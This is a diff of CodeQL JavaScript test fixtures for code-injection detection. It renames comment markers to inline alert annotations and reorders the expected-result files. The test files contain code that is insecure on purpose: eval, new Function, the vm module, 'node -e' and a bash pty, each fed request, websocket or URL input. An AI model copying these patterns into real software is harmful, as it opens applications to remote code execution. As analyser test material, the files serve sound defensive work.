react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -29,17 +29,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | @@ -64,24 +64,24 @@ nodes | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | | eslint-escope-build.js:20:22:20:22 | c | semmle.label | c | | eslint-escope-build.js:21:16:21:16 | c | semmle.label | c | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | @@ -105,25 +105,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected index 48fa61317807..84c50efddc96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.expected @@ -1,3 +1,12 @@ +#select +| bad-code-sanitization.js:8:27:8:46 | statements.join(';') | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | bad-code-sanitization.js:8:27:8:46 | statements.join(';') | Code construction depends on an $@. | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | improperly sanitized value | +| bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | Code construction depends on an $@. | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | improperly sanitized value | +| bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | improperly sanitized value | +| bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | Code construction depends on an $@. | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | improperly sanitized value | +| bad-code-sanitization.js:64:27:64:36 | assignment | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | bad-code-sanitization.js:64:27:64:36 | assignment | Code construction depends on an $@. | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | improperly sanitized value | edges | bad-code-sanitization.js:2:12:2:90 | /^[_$a- ... key)}]` | bad-code-sanitization.js:7:31:7:43 | safeProp(key) | provenance | | | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | bad-code-sanitization.js:2:12:2:90 | /^[_$a- ... key)}]` | provenance | | @@ -27,12 +36,3 @@ nodes | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | semmle.label | JSON.stringify(key) | | bad-code-sanitization.js:64:27:64:36 | assignment | semmle.label | assignment | subpaths -#select -| bad-code-sanitization.js:8:27:8:46 | statements.join(';') | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | bad-code-sanitization.js:8:27:8:46 | statements.join(';') | Code construction depends on an $@. | bad-code-sanitization.js:2:69:2:87 | JSON.stringify(key) | improperly sanitized value | -| bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | Code construction depends on an $@. | bad-code-sanitization.js:15:44:15:63 | htmlescape(pathname) | improperly sanitized value | -| bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:19:27:19:47 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:31:30:31:50 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:40:23:40:43 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | Code construction depends on an $@. | bad-code-sanitization.js:44:22:44:42 | JSON.st ... (input) | improperly sanitized value | -| bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | Code construction depends on an $@. | bad-code-sanitization.js:52:28:52:62 | JSON.st ... bble")) | improperly sanitized value | -| bad-code-sanitization.js:64:27:64:36 | assignment | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | bad-code-sanitization.js:64:27:64:36 | assignment | Code construction depends on an $@. | bad-code-sanitization.js:63:31:63:49 | JSON.stringify(key) | improperly sanitized value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref index 20c6dffd7b3e..7b474710a84e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/ImproperCodeSanitization.qlref @@ -1 +1,2 @@ -Security/CWE-094/ImproperCodeSanitization.ql +query: Security/CWE-094/ImproperCodeSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js index 6facf5ec75a5..0aeb77af5a20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js @@ -14,12 +14,12 @@ app.post("/documents/find", (req, res) => { MongoClient.connect("mongodb://localhost:27017/test", (err, db) => { let doc = db.collection("doc"); - doc.find(query); // NOT OK, but that is flagged by js/sql-injection [INCONSISTENCY] - doc.find({ $where: req.body.query }); // NOT OK - doc.find({ $where: "name = " + req.body.name }); // NOT OK + doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection + doc.find({ $where: req.body.query }); // $ Alert[js/code-injection] + doc.find({ $where: "name = " + req.body.name }); // $ Alert[js/code-injection] function mkWhereObj() { - return { $where: "name = " + req.body.name }; // NOT OK + return { $where: "name = " + req.body.name }; // $ Alert[js/code-injection] } doc.find(mkWhereObj()); // the alert location is in mkWhereObj. diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected index 868f2a287441..c466338d82ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.expected @@ -1,3 +1,8 @@ +#select +| lib/index.js:2:21:2:24 | data | lib/index.js:1:35:1:38 | data | lib/index.js:2:21:2:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:1:35:1:38 | data | library input | lib/index.js:2:15:2:30 | "(" + data + ")" | interpreted as code | +| lib/index.js:6:26:6:29 | name | lib/index.js:5:35:5:38 | name | lib/index.js:6:26:6:29 | name | This string concatenation which depends on $@ is later $@. | lib/index.js:5:35:5:38 | name | library input | lib/index.js:6:17:6:29 | "obj." + name | interpreted as code | +| lib/index.js:14:21:14:24 | data | lib/index.js:13:38:13:41 | data | lib/index.js:14:21:14:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:13:38:13:41 | data | library input | lib/index.js:14:15:14:30 | "(" + data + ")" | interpreted as code | +| lib/index.js:22:7:22:10 | data | lib/index.js:19:26:19:29 | data | lib/index.js:22:7:22:10 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:19:26:19:29 | data | library input | lib/index.js:25:24:25:26 | str | interpreted as code | edges | lib/index.js:1:35:1:38 | data | lib/index.js:2:21:2:24 | data | provenance | | | lib/index.js:5:35:5:38 | name | lib/index.js:6:26:6:29 | name | provenance | | @@ -13,8 +18,3 @@ nodes | lib/index.js:19:26:19:29 | data | semmle.label | data | | lib/index.js:22:7:22:10 | data | semmle.label | data | subpaths -#select -| lib/index.js:2:21:2:24 | data | lib/index.js:1:35:1:38 | data | lib/index.js:2:21:2:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:1:35:1:38 | data | library input | lib/index.js:2:15:2:30 | "(" + data + ")" | interpreted as code | -| lib/index.js:6:26:6:29 | name | lib/index.js:5:35:5:38 | name | lib/index.js:6:26:6:29 | name | This string concatenation which depends on $@ is later $@. | lib/index.js:5:35:5:38 | name | library input | lib/index.js:6:17:6:29 | "obj." + name | interpreted as code | -| lib/index.js:14:21:14:24 | data | lib/index.js:13:38:13:41 | data | lib/index.js:14:21:14:24 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:13:38:13:41 | data | library input | lib/index.js:14:15:14:30 | "(" + data + ")" | interpreted as code | -| lib/index.js:22:7:22:10 | data | lib/index.js:19:26:19:29 | data | lib/index.js:22:7:22:10 | data | This string concatenation which depends on $@ is later $@. | lib/index.js:19:26:19:29 | data | library input | lib/index.js:25:24:25:26 | str | interpreted as code | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref index 1b4dc21b8205..6e2be158d1d1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/UnsafeCodeConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-094/UnsafeCodeConstruction.ql +query: Security/CWE-094/UnsafeCodeConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js index df5cd88971a3..62158678073c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js @@ -1,5 +1,5 @@ const github = require('@actions/github'); function test() { - eval(github.context.payload.commits[1].message); // NOT OK + eval(github.context.payload.commits[1].message); // $ Alert[js/code-injection] } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js index 658d71e4c879..fb28264b5cec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js @@ -1,66 +1,66 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on(location.search); // OK + $scope.$on(location.search); }) .controller('MyController', function($scope) { - $scope.$apply('hello'); // OK + $scope.$apply('hello'); }) .controller('MyController', function($scope) { var scope = $scope; - scope.$apply(location.search); // BAD + scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$apply(location.search); // BAD + $scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$applyAsync(location.search); // BAD + $scope.$applyAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$eval(location.search); // BAD + $scope.$eval(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$evalAsync(location.search); // BAD + $scope.$evalAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watch(location.search); // BAD + $scope.$watch(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchCollection(location.search); // BAD + $scope.$watchCollection(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchGroup(location.search); // BAD + $scope.$watchGroup(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile('hello'); // OK + $compile('hello'); }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { var compile = $compile; - compile(location.search); // BAD + compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($parse) { - $parse(location.search); // BAD + $parse(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($interpolate) { - $interpolate(location.search); // BAD + $interpolate(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], location.search); // BAD + $filter('orderBy')([], location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], 'hello'); // OK + $filter('orderBy')([], 'hello'); }) .controller('MyController', function($filter) { - $filter('random')([], location.search); // OK + $filter('random')([], location.search); }) .controller('MyController', function($someService) { - $someService('orderBy')([], location.search); // OK + $someService('orderBy')([], location.search); }) .controller('MyController', function($someService) { - $someService(location.search); // OK + $someService(location.search); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js index f330b1513546..8714a1fa690f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js @@ -1,22 +1,22 @@ function safeProp(key) { - return /^[_$a-zA-Z][_$a-zA-Z0-9]*$/.test(key) ? `.${key}` : `[${JSON.stringify(key)}]`; + return /^[_$a-zA-Z][_$a-zA-Z0-9]*$/.test(key) ? `.${key}` : `[${JSON.stringify(key)}]`; // $ Source[js/bad-code-sanitization] } function test1() { const statements = []; statements.push(`${name}${safeProp(key)}=${stringify(thing[key])}`); - return `(function(){${statements.join(';')}})` // NOT OK + return `(function(){${statements.join(';')}})` // $ Alert[js/bad-code-sanitization] } import htmlescape from 'htmlescape' function test2(props) { const pathname = props.data.pathname; - return `function(){return new Error('${htmlescape(pathname)}')}`; // NOT OK + return `function(){return new Error('${htmlescape(pathname)}')}`; // $ Alert[js/bad-code-sanitization] } function test3(input) { - return `(function(){${JSON.stringify(input)}))` // NOT OK + return `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] } function evenSaferProp(key) { @@ -24,24 +24,24 @@ function evenSaferProp(key) { } function test4(input) { - return `(function(){${evenSaferProp(input)}))` // OK + return `(function(){${evenSaferProp(input)}))` } function test4(input) { - var foo = `(function(){${JSON.stringify(input)}))` // NOT OK - we can type-track to a code-injection sink, the source is not remote flow. + var foo = `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] - we can type-track to a code-injection sink, the source is not remote flow. setTimeout(foo); } function test5(input) { - console.log('methodName() => ' + JSON.stringify(input)); // OK + console.log('methodName() => ' + JSON.stringify(input)); } function test6(input) { - return `(() => {${JSON.stringify(input)})` // NOT OK + return `(() => {${JSON.stringify(input)})` // $ Alert[js/bad-code-sanitization] } function test7(input) { - return `() => {${JSON.stringify(input)}` // NOT OK + return `() => {${JSON.stringify(input)}` // $ Alert[js/bad-code-sanitization] } var express = require('express'); @@ -49,7 +49,7 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // NOT - the source is remote-flow, but we know of no sink. + var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // $ Alert[js/bad-code-sanitization] - the source is remote-flow, but we know of no sink. setTimeout(`(function(){${JSON.stringify(req.param("wobble"))}))`); // OK - the source is remote-flow, and the sink is code-injection. @@ -60,8 +60,8 @@ app.get('/some/path', function(req, res) { // Bad documentation example: function createObjectWrite() { - const assignment = `obj[${JSON.stringify(key)}]=42`; - return `(function(){${assignment}})` // NOT OK + const assignment = `obj[${JSON.stringify(key)}]=42`; // $ Source[js/bad-code-sanitization] + return `(function(){${assignment}})` // $ Alert[js/bad-code-sanitization] } // Good documentation example: @@ -87,6 +87,6 @@ function good() { function createObjectWrite() { const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`; - return `(function(){${assignment}})` // OK + return `(function(){${assignment}})` } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js index 3a5abba84c03..3cb4837c2f9e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js @@ -3,35 +3,28 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // NOT OK - var f = new Function("return wibbles[" + req.param("wobble") + "];"); - // NOT OK - require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); + var f = new Function("return wibbles[" + req.param("wobble") + "];"); // $ Alert[js/code-injection] + require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); // $ Alert[js/code-injection] var runC = require("vm").runInNewContext; - // NOT OK - runC("return wibbles[" + req.param("wobble") + "];"); + runC("return wibbles[" + req.param("wobble") + "];"); // $ Alert[js/code-injection] var vm = require("vm"); - // NOT OK - vm.compileFunction(req.param("code_compileFunction")); - // NOT OK - var script = new vm.Script(req.param("code_Script")); - // NOT OK - var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); - // NOT OK - vm.runInContext(req.param("code_runInContext"), vm.createContext()); + vm.compileFunction(req.param("code_compileFunction")); // $ Alert[js/code-injection] + var script = new vm.Script(req.param("code_Script")); // $ Alert[js/code-injection] + var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); // $ Alert[js/code-injection] + vm.runInContext(req.param("code_runInContext"), vm.createContext()); // $ Alert[js/code-injection] }); const cp = require('child_process'); app.get('/other/path', function(req, res) { - const taint = req.param("wobble"); - cp.execFileSync('node', ['-e', taint]); // NOT OK + const taint = req.param("wobble"); // $ Source[js/code-injection] + cp.execFileSync('node', ['-e', taint]); // $ Alert[js/code-injection] - cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK + cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); }); const pty = require('node-pty'); app.get('/terminal', function(req, res) { - const taint = req.param("wobble"); + const taint = req.param("wobble"); // $ Source[js/code-injection] const shell = pty.spawn('bash', [], { name: 'xterm-color', cols: 80, @@ -40,13 +33,13 @@ app.get('/terminal', function(req, res) { env: process.env }); - shell.write(taint); // NOT OK + shell.write(taint); // $ Alert[js/code-injection] }); require("express-ws")(app); app.ws("/socket-thing/", function (ws, req) { - ws.on("message", function (msg) { - eval(msg); // NOT OK + ws.on("message", function (msg) { // $ Source[js/code-injection] + eval(msg); // $ Alert[js/code-injection] }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 9df334c56dc1..5cab7f3cec32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -1,31 +1,31 @@ -export function unsafeDeserialize(data) { - return eval("(" + data + ")"); // NOT OK +export function unsafeDeserialize(data) { // $ Source[js/unsafe-code-construction] + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } -export function unsafeGetter(obj, name) { - return eval("obj." + name); // NOT OK +export function unsafeGetter(obj, name) { // $ Source[js/unsafe-code-construction] + return eval("obj." + name); // $ Alert[js/unsafe-code-construction] } export function safeAssignment(obj, value) { - eval("obj.foo = " + JSON.stringify(value)); // OK + eval("obj.foo = " + JSON.stringify(value)); } -global.unsafeDeserialize = 